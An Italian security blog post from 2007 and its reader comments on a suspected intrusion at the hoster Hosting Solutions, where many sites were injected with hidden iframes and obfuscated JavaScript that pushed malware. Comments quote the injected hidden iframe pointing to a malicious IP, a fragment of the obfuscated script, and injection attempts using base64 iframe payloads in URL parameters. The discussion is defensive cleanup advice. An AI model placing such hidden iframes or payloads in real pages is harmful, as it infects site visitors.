Possibile intrusione nei sistemi Hosting Solutions

In riferimento al caso del noto cantante italiano Roberto Vecchioni, già analizzato precedentemente qui, ho avuto modo di andare un po’ più a fondo sulla questione e mi sono accorto di qualcosa che sembrerebbe ben più grave.

Il sito di Roberto Vecchioni è ospitato sui server di Hosting Solutions, attualmente uno dei più rinomati hoster italiani. Insieme al sito di Vecchioni sono ospitati, sia sullo stesso server che su altri server messi a disposizione dalla società per hosting, moltissimi altri siti web.

Quello che però è balzato all’occhio è stato che molti altri siti sono stati modificati, utilizzando le stesse modalità di attacco portate avanti verso il sito di Vecchioni. Molti siti al momento contengono dunque lo stesso codice malevolo che era contenuto nel sito del cantante italiano.

Il fatto che i siti siano ospitati su server differenti, non riconducibili dunque ad un solo indirizzo IP, potrebbe far pensare due cose:

  • su tutti questi server sono stati trovati alcuni siti web che utilizzavano qualche script php/asp non sicuro e sono riusciti ad entrare nel server (il che non dovrebbe accadere, teoricamente, se gli spazi sono ben definiti e sicuri l’un l’altro);

  • i server soffrono di qualche falla che ha permesso l’intrusione dall’esterno

    • In entrambi i casi, vorrei consigliare a tutti i webmaster che hanno un sito web ospitato nei server di Hosting Solutions di controllare i propri siti e il codice html, alla ricerca di iframe che reindirizzano ad indirizzi IP non conosciuti o codici JavaScript offuscati che non sono frutto di un proprio lavoro. Consiglierei inoltre il cambio di tutte le password di accesso, per essere scrupolosi ed evitare che ci siano stati furti di dati personali.

    Al momento ho potuto contattare Hosting Solutions, i quali mi hanno rapidamente confermato che hanno applicato tutte le contromisure necessarie per bloccare l’attacco informatico, per cui la/le eventuale/i falla/e dovrebbero essere state del tutto risolte.

    Questo è un breve filmato che mostra cosa accade navigando su una pagina infetta.

    Scritto il 30 Aprile 2007


    80 Responses to “Possibile intrusione nei sistemi Hosting Solutions”


    1. TNT
      Aprile 30th, 2007 at 19:00

      Non vorrei sembrare uno che fa polemiche gratuite, ma mi chiedo quando si iniziera’ a prendere sul serio la sicurezza in Italia. Gia’ oggi e’ uno dei paesi presi maggiormente di mira dalla criminalita’ informatica (anzi, io direi quello preso maggiormente di mira in assoluto, insieme al Brasile). Bisognera’ aspettare che l’intera rete Internet diventi inutilizzabile per gli utenti italiani prima che si faccia qualcosa? :(


    2. Marco
      Aprile 30th, 2007 at 19:11

      Approfitto per un msg diretto: ciao TNT, è una vita che non ci si sente :) che fine hai fatto? :)

      Sul caso non mi espongo ancor più per oggi, quello che dovevo dire l’ho detto sopra :) Però in linea generale sai che concordo totalmente con te :)


    3. TNT
      Aprile 30th, 2007 at 19:16

      Marco, stasera ti scrivo via e-mai… :) Tanto so che ti trovo fino a tardi. :D


    4. Marco
      Aprile 30th, 2007 at 19:18

      non so come mai, ma mi dite tutti così :D sono un tipo notturno forse :D


    5. sistemista
      Aprile 30th, 2007 at 19:34

      eh lo so, qui in Italia ci vorrebero gli stessi sistemisti che ha la prevx e la sunblet, ma fatemi il piacere!!!!!!!


    6. Marco
      Aprile 30th, 2007 at 19:38

      Non sono un sistemista e non ho detto questo :)


    7. TNT
      Aprile 30th, 2007 at 19:47

      Sistemista: cosa c’entra? Mi vuoi spiegare tu la ragione per cui l’Italia e’ presa cosi’ di mira, per antipatia nei confronti della pizza? :\


    8. m4v3rick
      Aprile 30th, 2007 at 20:01

      per gli attacchi verso i server di hosting mi astengo. Non faccio il sistemista per cui non mi esprimo su come in realta’ sia la situazione italiana. Per quanto riguarda l’utenza casalinga diciamo che ci sono molti passi avanti da fare. Basterebbe fare una leggina per i numeri a volore aggiunto o anche semplicimente l’abilitazione su richiesta e gia’ si potrebber far fuori gli infami dialer (che credo in questo possiamo vanatre un primato mondiale). Per i keylogger e gli altri malware che trasformano il pc in bot , spyware ecc. bisogna metterci un po’ di impegno ma questo dipende dal fatto che win è un s.o. che offre molte possibilita’ di essere infettato.


    9. TNT
      Aprile 30th, 2007 at 20:08

      Maverick, si’ per i dialer siamo i primi al mondo. Un primato che non fa certo onore.

      Per quanto riguarda la sicurezza dei siti… guarda, o sono stato sfortunato io beccando tutti quelli insicuri quando ho dovuto fare degli auditing, oppure siamo VERAMENTE messi male. E sto parlando di siti che erano su da mesi o addirittura anni, non certo di siti ancora da mettere online o appena messi online.


    10. m4v3rick
      Aprile 30th, 2007 at 21:23

      TNT :-) che mito … una volta ho beccato un tuo post, “cazziandolo”, in cui informavi un tizio che il suo server era stato violato. Secondo me una perfetta conoscenza della lingua inglese è determinante per la sicurezza. E anche la voglia di aggiornarsi continuamente il che costa molta fatica.


    11. m4v3rick
      Aprile 30th, 2007 at 21:24

      ops il “cazziandolo” va dopo tizio …. scrivo malissimo


    12. TNT
      Aprile 30th, 2007 at 21:47

      Maverick, questa non me la ricordo… che post era… dove? :)


    13. m4v3rick
      Aprile 30th, 2007 at 21:55

      non lo ricordo neppure io esattamente dove fosse. C’era un tizio che aveva un problema analogo a quello che è successo con il sito di vecchioni (un iframe mi pare , non un javascript) e si lavementava del fatto che i visitatori venivano infettati e non riusciva a capire perche’ e tu gli hai detto dov’era il problema è chie si doveva preoccupare principalmente del fatto il sito era stato violato. A meno che non ci sia un altro Tnt ,ma lo stile era il tuo :-D che uomo risoluto :-D .
      P.s. il fatto che lavori per un’azienda famosa ed importante provoca sempre l’invidia di qualcuno


    14. TNT
      Aprile 30th, 2007 at 21:58

      :D “Un uomo risoluto”… macche’ e’ solo che bevo troppo caffe’ e m’innervosisco subito per niente… :D


    15. Alfonso Maruccia aka The King of GnG
      Aprile 30th, 2007 at 23:51

      www.gaveli.it. L’add-on per i domini di Firefox stasera non mi funziona, e sono troppo pigro per mettermi a cercare altrove. Per caso qualcuno mi può dire se fa anch’esso parte del servizio di hosting attaccato?

      No perché la schifezza che tenta di scaricarmi sul PC, accedendoci con IE (devo disinstallarla, IE Tab, assolutamente…..), è la stessa del sito di Vecchioni, il worm Nurech. Fortuna che AVS blocca tutto in tempo, evitando all’HIPS di dover intervenire alla bisogna…..


    16. Marco
      Aprile 30th, 2007 at 23:53

      Si, identico. Fa parte di Hosting Solutions ;)


    17. Alfonso Maruccia aka The King of GnG
      Maggio 1st, 2007 at 00:01

      Ah perfetto, direi che è un attacco di quelli potenzialmente dirompenti. Gromozon ha fatto scuola, altro che Brasile……Ci stima facendo la nomea di essere un paese cuscino per i malware e i malware writer….


    18. Marco
      Maggio 1st, 2007 at 00:05

      Come detto nell’articolo, ho già avuto contatti con Hosting Solutions e mi hanno assicurato di aver applicato adeguate contromisure.

      Personalmente, pensiero mio personale, temo per la privacy degli utenti e il rischio malware, un attacco di questa portata non è da sottovalutare.


    19. Alfonso Maruccia aka The King of GnG
      Maggio 1st, 2007 at 00:12

      Marco, secondo me ti han detto un po’ una cosa non vera riguardo le contromisure prese. Se il sito gaveli fa parte dello stesso servizio di Hosting, e il suddetto gaveli risulta ancora bello pregno di worm, ne consegue che le contromisure suddette sono aria fritta :D

      Io già m’immagino, nei giorni prossimi morti, feriti e isterismi di massa causati da un attacco a tappeto del worm….. *esagerazione filmica, devo smetterla di dedicarmi al catastrofismo con contorno di olocausti zombeschi…..*


    20. Marco
      Maggio 1st, 2007 at 00:14

      Beh, le contromisure vengono applicate per evitare che possano di nuovo effettuare l’attacco. Bonificare poi i siti già attaccati è opera dei webmaster oppure dello stesso hoster che se li passa tutti in rassegna :)


    21. Sbronzo di Riace
      Maggio 1st, 2007 at 11:13

      Posta per te

      http://www.hwupgrade.it/forum/showthread.php?t=1463144

      E’ la solita e-mail di un presunto avvocato di una messa in mora eccetera Nod32 e prevx non riconoscono il dialer.


    22. Alfonso Maruccia aka The King of GnG
      Maggio 1st, 2007 at 12:10

      Hella peppa, un malware nuovo nuovo. Con le definizioni aggiornate ad un paio di giorni fa (schifo di auto-update) l’antivirus non me lo riconosce. Fatto l’update è saltato fuori il solito cavallo di troia, così nomato: Trojan-Clicker.Win32.Agent.ip


    23. Marco
      Maggio 1st, 2007 at 12:14

      Si, tra due minuti c’è l’articolo pronto su PC Al Sicuro, lo sto scrivendo :)


    24. Fabrizio
      Maggio 2nd, 2007 at 07:53

      Buongiorno a tutti, e buon rientro a lavoro per chi come me rientra oggi a lavoro dopo i vari ponti.

      Non parlo per sentito dire, ma per esperienza diretta confortata anche da colleghi che lavorano in HS. Chi lesse il mio profilo, sa che sono di Firenze pure io, e la HS la conoscno fin dagli albori.

      Sui server fallati non ci metterei la mano sul fuoco, anche se tutto può essere. Imho tutto è molto più probabile che ci sia qualche script “iniettabile” allo scopo.. Non sarebbe la prima volta che qualche codice PHP (e non per questo accuso PHP anzi) si fa tramite per questi infami giochetti..


    25. Pin
      Maggio 2nd, 2007 at 12:54

      Non so se qui c’è chi fa il furbo oppure no.
      Questa mattina (02/05) i nostri siti appoggiati presso HS erano tutti modificati con lo script infetto.

      Ho parlato con HS e anche a me hanno garantito che avrebbero effettuato il ripristino e i controlli, e mi hanno chiesto di cambiare le password FTP.

      La cosa che mi preoccupa è che la stessa cosa è avvenuta in forma diversa anche alcune settimane fa.

      Ah, i nostri siti sono in ASP, ASP.NET e solo html.

      Possibile che non vi siano responsabilità a riguardo?


    26. Marco
      Maggio 2nd, 2007 at 16:37

      Se sono stati modificati di nuovo quest’oggi evidentemente allora non sono state prese tutte le contromisure necessarie, a quanto sembrerebbe.

      Sarebbe necessario un comunicato generale, PC Al Sicuro non ha tutto questo grande pubblico, sono circa 1000 visitatori unici al giorno.


    27. TNT
      Maggio 2nd, 2007 at 19:45

      Pin, se gli iframe appaiono anche nelle pagine solo html e’ stato bucato il server, poco ma sicuro.

      Marco: esatto. Sto controllando i vari siti (trovati con un reverse dns) con una macchina che verifica automaticamente i “drive by download” su un browser vulnerabile, e non solo ce ne sono parecchi che infettano, ce ne sono anche molti che non infettano semplicemente perche’ i server remoti malefici in questo momento non funzionano. :\


    28. maurizio
      Maggio 2nd, 2007 at 20:25

      Confermo, ho alcuni siti su questi server e in tutte le pagine è stato inserito l’ iframe, indipendentemente dal fatto che queste siano dinamiche o meno


    29. m4v3rick
      Maggio 2nd, 2007 at 20:45

      se la societa’ di hosting non è in grado di risolvere il problema deve mettere il server offline. E’ una cosa troppo grave. Stanno rischiando grosso. Direi che potrebbero essere denunciati se sanno e non risolvono la situazione


    30. m4v3rick
      Maggio 2nd, 2007 at 20:45

      e.c. i server


    31. maurizio
      Maggio 2nd, 2007 at 20:56

      se penso a quanti pc potrei infettare con i miei sito mi viene la pelle d’ oca!!
      e non posso fare niente, non posso connettermi in ftp che sembra disattivato!


    32. Marco
      Maggio 2nd, 2007 at 22:23

      L’IP che hanno piazzato più frequentemente nell’iframe, il 58., fa da ponte poi per i redirect che gestiscono loro.

      Meno frequentemente hanno piazzato dei JS offuscati.

      Non è assolutamente una bella situazione


    33. TNT
      Maggio 2nd, 2007 at 22:51

      I siti sono ancora “infettanti”. Bella debacle. :(


    34. Marco
      Maggio 2nd, 2007 at 22:53

      Temo che per aver risolto, come dicevo sopra, vogliano dire che hanno trovato la falla da cui sono entrati gli attacker e l’hanno chiusa. La bonifica però dei siti sto avendo dubbi che l’abbiano lasciata agli utenti, senza avvertire nessuno…perlomeno così sembrerebbe da chi scrive qui, cioè che non ci sia stata nessuna comunicazione ufficiale.


    35. m4v3rick
      Maggio 2nd, 2007 at 23:10

      assurdo… dovevano eliminare le modifiche delle pagine.E’ loro responsabilita’. E’ molto grave quello che sta accadendo


    36. TNT
      Maggio 2nd, 2007 at 23:34

      Tre giorni senza risolvere alcunche’ su centinaia di siti mi sembrano effettivamente eccessivi… vediamo come si mettono le cose…

      Che tristezza pero’…


    37. m4v3rick
      Maggio 2nd, 2007 at 23:55

      beh non si stanno facendo una bella pubblicita’. Non metterei mai un mio sito su un hoster del genere. E se l’avessi, disdetta non appena scade il contratto. Potrei anche fargli causa o addirittura denunciarli.


    38. Fabrizio
      Maggio 3rd, 2007 at 07:47

      A questo punto pare evidente una bella epidemia pero’ a basso livello.. Sarei curioso di vedere l’incidenza dei sistemi operativi, sempre che le macchine usate per hosting, non siano PC dedicati, bensi degli “enormi” VPS.. Sarei curioso di conoscere il software di base per fare questi serveroni..


    39. francesco
      Maggio 3rd, 2007 at 09:14

      Come dice Fabrizio sarebbe importante capire quali S.O. siano stati attaccati e soprattutto quale vulnerabilità sia stata sfruttata…
      qualcuno parlava di ASP, ASP.NET e html puro…
      è stato aggiunto che l’FTP è stato disabilitato….
      quindi una 0-day sull’ftp di microsoft ?
      o semplicemente una patch non passata ?


    40. Pin
      Maggio 3rd, 2007 at 09:35

      Io credo che sia stato bucato il server.
      Da HS dicono che l’accesso è avvenuto via FTP con password regolari (e per questo cercavano anche di dare la colpa a noi). Ho dovuto fargli notare che diversi altri siti non nostri erano stati modificati per ricevere un generico “facciamo una verifica”.

      Quello che mi chiedo è se vi possano essere delle responsabilità per una gestione del genere (a noi è la seconda volta che capita in un paio di mesi).


    41. m4v3rick
      Maggio 3rd, 2007 at 09:48

      Certo che ci sono delle responsabilita’.Non capisco perche’ non rimuovono il codice infetto. Assurdo


    42. Fabrizio
      Maggio 3rd, 2007 at 13:19

      @pin: che sia stato “bucato” il server, o che sia stato un problema di sistema operativo, la cosa è simile ma non uguale.

      Sarebbe infatti necessario capire, anzitutto la causa, e imho, stanno brancolando nel buio. Questo mi fa pero’ pensare e sospettare sempre più che adottino dei mega VPS “preconfezionati” tutti uguali per diversi server di hosting. Soluzione utile, soprattutto per prblemi di HA e Failover, quindi non sarebbe proprio impensabile.

      Di conseguenza, se così fosse, ci sarebbe da capire se è il software di base dei VPS ad esser portatore di infezione, o la “scatola all’esterno” che è stata infettata e ha poi ramificato la cosa ai server sotto emulati.

      Le responsabilità ci sono e determinanti, e imho, visto quanto successo, la prima cosa è stabilirne con certezza la causa, patchare, e poi nel caso, daccordo con il cliente ripristinare un backup a prima del fattaccio.

      Non occorre troppa scienza infusa, solo un po’ di attitudine al problem solving.

      Per la cronaca, i miei vecchi datori di lavoro usano tutt’ora hostingsolutions. Bene hosting su piattaforma linux con php, non è stato intaccato. Quello di un altro dominio “riservato” su piattaforma ASP o ASPx salvo il vero, si.


    43. francesco
      Maggio 3rd, 2007 at 15:37

      giusto per la cronaca, ho trovato fra i miei log queste richieste (fanno riferimento a pagine esistenti) ma i parametri sono da ijection…. o cosa ?
      Cioè: che cosa stanno tentando di fare ? cosa cercano di sfruttare ?


    44. francesco
      Maggio 3rd, 2007 at 15:38

      Ecco il log:
      ?regione=&provincia=AQ&sistemazione=1 HTTP/1.0″
      ?regione=10&provincia=AQ&sistemazione= HTTP/1.0″


    45. francesco
      Maggio 3rd, 2007 at 15:42

      scusate, ma mi taglia la parte: in pratica ci sono una serie di richieste che sostituiscono, a turno, ad uno dei parametri un valore che inizia con iframe src= poi tra virgolette data:text/html base64,(stringa encodata).

      da quello che capisco vorrebbero cercare di vedere se i parametri di queste URL vengono per caso memorizzati e soprattutto mostrati da qualche pagina sul sito… giusto ? e immagino che questo iframe encodato scateni l’inferno….


    46. Marco
      Maggio 3rd, 2007 at 16:29

      Francesco, scusa se viene tagliato e ti dà errore, ho dei meccanismi di protezione


    47. francesco
      Maggio 3rd, 2007 at 16:43

      immaginavo, ma pensavo che facesse un “escape” dei caratteri, cioè che li rappresentasse a video trasformando lui in & lt ;


    48. Marco
      Maggio 3rd, 2007 at 16:46

      Viene passato al controllo ogni POST con ciò che ne contiene, per questo viene identificato. È un pò restrittiva come cosa, ma visti gli ultimi mesi se non si alzano un pò le difese :D


    49. Andrea
      Maggio 3rd, 2007 at 17:01

      Scusate, sono arrivato qua da un link sul forum di Punto Informatico. Ma possibile che di una cosa così grave se ne parli solo qui? Io se non ci capitavo per caso neanche l’avrei mai saputo.


    50. TNT
      Maggio 3rd, 2007 at 17:13

      Andrea: beh si’… possibilissimo… d’altronde di Gromozon, forse l’infezione piu’ grave del 2006, per mesi se n’e’ parlato solo qui e su pochissimi altri forum.


    51. Marco
      Maggio 3rd, 2007 at 17:20

      Andrea: ringrazia che se ne parli almeno qui :D :D

      scherzi a parte, PC Al Sicuro non ha un grande bacino di utenza, per cui probabilmente non se ne sono neanche accorti :)


    52. m4v3rick
      Maggio 3rd, 2007 at 19:55

      tranquilli.Ci penso io a diffondere la notizia con le mie 1000 visite in un mese :-D :-D
      mi sa che chiudo baracca e burattini :-D


    53. TNT
      Maggio 3rd, 2007 at 20:17

      Maverick non chiudere ASSOLUTAMENTE, il tuo blog e’ una figata. :)


    54. Alfonso Maruccia aka The King of GnG
      Maggio 3rd, 2007 at 21:40

      Well, io scrivo per Punto Informatico, oltre che per MegaLab.it. Ho già segnalato la cosa a chi di dovere, però non ho avuto risposta. Quello che posso fare è ri-segnalare la cosa, e scriverne per MegaLab.it se trovo il tempo…..


    55. m4v3rick
      Maggio 3rd, 2007 at 22:18

      TNT sfotti? :-D . Te ne approfitti perchè hai i mezzi a disposizione :-D . Comunque il mio obiettivo è che un virus oscuri il mio blog come successo ad alcuni forum e a questo sito :-D
      Vuol dire che ho dato fastidio almeno un pochino .


    56. TNT
      Maggio 3rd, 2007 at 22:29

      Maverick no dicevo sul serio. :)

      Comunque finche’ rimarrai su blogger la vedo dura, non credo si mettano a ddossare quello. ;)


    57. m4v3rick
      Maggio 3rd, 2007 at 22:38

      Non parlavo di un attacco ma di un virus che non permette al pc infetto di raggiungerlo. Ovviamente ho scelto blogger proprio per quel motivo. Credo che un ddos in quel caso sarebbe davvero darsi la zappa sui piedi da soli. Anche Gromozon è stato un errore se ci pensi. Un virus troppo astuto e difficile da rimuovere per non destare molta preoccupazione.Mi pare che la tendenza sia di non fare troppo rumore. Gromozon una volta scoperto è stato un terremoto


    58. Umberto
      Maggio 15th, 2007 at 12:16

      A proposito di HS e dell’attacco subito. Il mio sito (oltre 15000 visite) è stato coinvolto nell’attacco, a seguito di alcune segnalazioni di visitatori, segnalo l’accaduto a HS che mi risponde della presenza di un redirect a dramcnt.com che dovrei rintracciare in qualche modo. Apprendo ora dal vostro forum di tutto l’accaduto e sinceramente, non riesco a trovare nel sito (portale joomla) ne il link ne il JS oscurato (che non conosco bene come sia).
      Sono in cerca di una spiegazione più accurata (=semplificata) per un web master in erba.


    59. Marco
      Maggio 15th, 2007 at 12:26

      guarda nel codice delle pagine web se c’è un IFRAME hidden che ti connette ad un sito estero. C’è, perché stavo controllando due minuti fa, prima che mettessi il sito offline :) Ora che è offline non posso sapere esattamente dove sia


    60. Umberto
      Maggio 15th, 2007 at 12:55

      Ciao Marco,

      ho rimesso on line il sito (sperando di non causare ulteriori danni)


    61. Umberto
      Maggio 15th, 2007 at 12:57

      L’IFRAME hidden (quindi nascosto) come faccio a scovarlo?

      Vorrei verificare tutti gli altri siti che ho su HS :-(


    62. Marco
      Maggio 15th, 2007 at 13:00

      Se non è in home, controlla i php che vengono caricati dalla home, inclusi. Sicuramente ci trovi un codice tipo < iframe > indirizzo web o alla fine della pagina un JavaScript scritto in maniera strana (parecchi numeri e lettere) che tu sai non essere opera tua :D


    63. Umberto
      Maggio 15th, 2007 at 13:06

      Approfitto ancora,
      il sito è stato realizzato con joomla, e io non ho scritto una riga di codice (praticamente), ho provato a cercare tra tutti i rimandi e richiami, ma penso di essermi perso.


    64. Marco
      Maggio 15th, 2007 at 13:16

      Fai una cosa: prova a guardare i file che sono stati ultimamente modificati, ordinali per data, dopo di che controlla all’interno di quelli.


    65. Umberto
      Maggio 15th, 2007 at 13:18

      Grazie,
      mi rimetto alla ricerca


    66. Umberto
      Maggio 16th, 2007 at 09:26

      Anche se molto tardi ho scovato il bas****o, un js oscurato, infilato in fondo ad una pagina del template di joomla che inizia così:
      e = ‘0×00′ + ‘77′;str1 = “%CC%94%9F%82%E8%8 …..

      non voglio metterlo tutto visto che la madre degli imbecilli è sempre gravida! :-)

      Grazie Marco e grazie al Forum di PC Al Sicuro!


    67. Marco
      Maggio 16th, 2007 at 11:22

      ottimo :)

      Di nulla :)


    68. Antonio
      Maggio 17th, 2007 at 16:30

      Ho trovato questo articolo solo oggi.
      I problemi alla hosting… sono moooolto più gravi di quello che sembra.
      Non si tratta solo di un malware che ha infettato migliaia di siti.
      Ci sono anche parecchie CENTINAIA di MIGLIAIA di domini di terzo livello attivati all’insaputa dei proprietari del dominio base, questi domini abusivi puntano ad altrettante pagine (ben indicizzate in google) con contenuti “molto discutibili”.


    69. TNT
      Maggio 19th, 2007 at 00:40

      Antonio, hai ragione, ho trovato ad esempio: http://www.google.com/search?q=inurl:%22lospaziobianco+it%22 ed e’ un disastro. Per fortuna al momento sono irraggiungibili, l’unico modo di vedere cosa c’era e’ guardare la cache (SCONSIGLIO di farlo se non si e’ adeguatamente protetti). Ce ne sono per caso alcuni ancora attivi?

      Mamma mia che roba… :(


    70. Antonio
      Maggio 20th, 2007 at 11:08

      Purtroppo la lista dei domini è molto lunga, io ne ho già trovati parecchie decine ciascuno con 10000-80000 hostnames abusivi.

      Su quelli che ho trovato un 30% sono ancora raggiungibili e google sta continuando ad indicizzare migliaia di pagine.

      Da notare che ho contattato telefonicamente un paio di proprietari dei domini e questi erano all’oscuro di tutto nonostante i loro record dns fossero stati fixati.

      Facendo una query del record SOA si può notare dal seriale che sono stati fixati fra il 10 ed il 15 maggio.

      Da notare che alcuni dei record dns abusivi puntano ad un ip nella stessa classe C dell’ iframe di cui si parla all’inizio di questo 3ad.

      Una coincidenza??


    71. Umberto
      Maggio 21st, 2007 at 13:42

      E’ successo ancora!
      altri 8 siti modificati in data 19/5/2007. Stessa tecnica con con JS e con iframe.

      Devo proprio cambiare provider?


    72. Marco
      Maggio 21st, 2007 at 14:10

      puoi passarmi maggiori dettagli (siti web) in e-mail? Trovi l’e-mail nella sezione “About me”.

      Grazie mille


    73. TNT
      Maggio 21st, 2007 at 15:47

      Umberto e Marco: se non vi spiace, comunicateli anche a me m4u7sih02@sneakemail.com (email che terro’ solo per breve tempo prima di cancellarla)… Oppure Marco se vuoi alla solita email (non la metto qui per evitare che inizi a ricevere spam)… :)


    74. Marco
      Maggio 21st, 2007 at 15:57

      Ok, ti tengo informato appena so qualcosa :)


    75. PC Al Sicuro » Blog Archive » Hosting Solutions: riflessioni post bug
      Maggio 28th, 2007 at 00:58

      […] È passato quasi un mese da quando su queste pagine avevamo parlato della difficile situazione in cui si erano ritrovati alcuni clienti dell’hoster Hosting Solutions, i siti dei quali erano stati vittima di un’intrusione con modifica della home page al fine di veicolare malware. […]


    76. Silvio
      Giugno 14th, 2007 at 05:55

      Ciao Marco spesso trovo qualche tuo articolo interessante ogni volta che ho problemi di sicurezza, ora ho un sito web con il tag maledetto
      proprio sul’index.htm della root
      {src=’http://58.65.239.180/’ width=5 height=5
      style=’display:none’}

      nonostante che ho rimosso tutta la pagina e sostituita
      facendone piu copie htm, html,asp, index ,default ecc..

      non c’e’ modo l’indirizzo principale continuia a rimanere bloccato
      da diversi giorni

      come e’ possibile ????

      Grazie e un saluto

      Silvio


    77. silvio
      Giugno 14th, 2007 at 06:21

      Mi correggo scopro solo ora che adesso ricaricando la pagina viene quella nuova, probabilmente era dovuto a qualche sistema di cache
      tutto a posto sembra che e’ sufficente cancellare quel tag

      Grazie


    78. PC Al Sicuro » Blog Archive » Possibile intrusione nei sistemi Aruba
      Giugno 16th, 2007 at 04:34

      […] Avevamo già parlato lo scorso mese di un intrusione avvenuta nei sistemi Hosting Solutions, intrusione che aveva permesso a degli attacker di modificare le home page di svariati siti web includendo un IFRAME che permettesse il redirect degli utenti verso siti web contenenti malware. […]


    79. Possibile intrusione nei sistemi Aruba « The Alexsandra Spaces
      Giugno 17th, 2007 at 09:38

      […] Pubblicato da Alexsandra su 17 Giugno 2007 Avevamo già parlato lo scorso mese di un intrusione avvenuta nei sistemi Hosting Solutions, intrusione che aveva permesso a degli attacker di modificare le home page di svariati siti web includendo un IFRAME che permettesse il redirect degli utenti verso siti web contenenti malware. […]


    80. PC Al Sicuro » Blog Archive » Siete sicuri che il vostro sito web non sia infetto?
      Luglio 29th, 2007 at 03:05

      […] Abbiamo parlato tempo addietro di Mpack e di come migliaia di siti web italiani siano rimasti vittima di un attacco sferrato secondo modalità ancora sconosciute. Ciò che è interessante è che, come già visto su queste pagine, l’attacco ad Aruba non è stato il primo ma almeno altri due hosting provider sono caduti vittima di attacker, i quali hanno iniettato codice malevolo all’interno dei siti ivi ospitati. […]

    Lascia un commento

    « Roberto Vecchioni vittima della vulnerabilità ANI
    Next: Avv. Ubaldo Santarelli: un altro avvocato torna a colpire »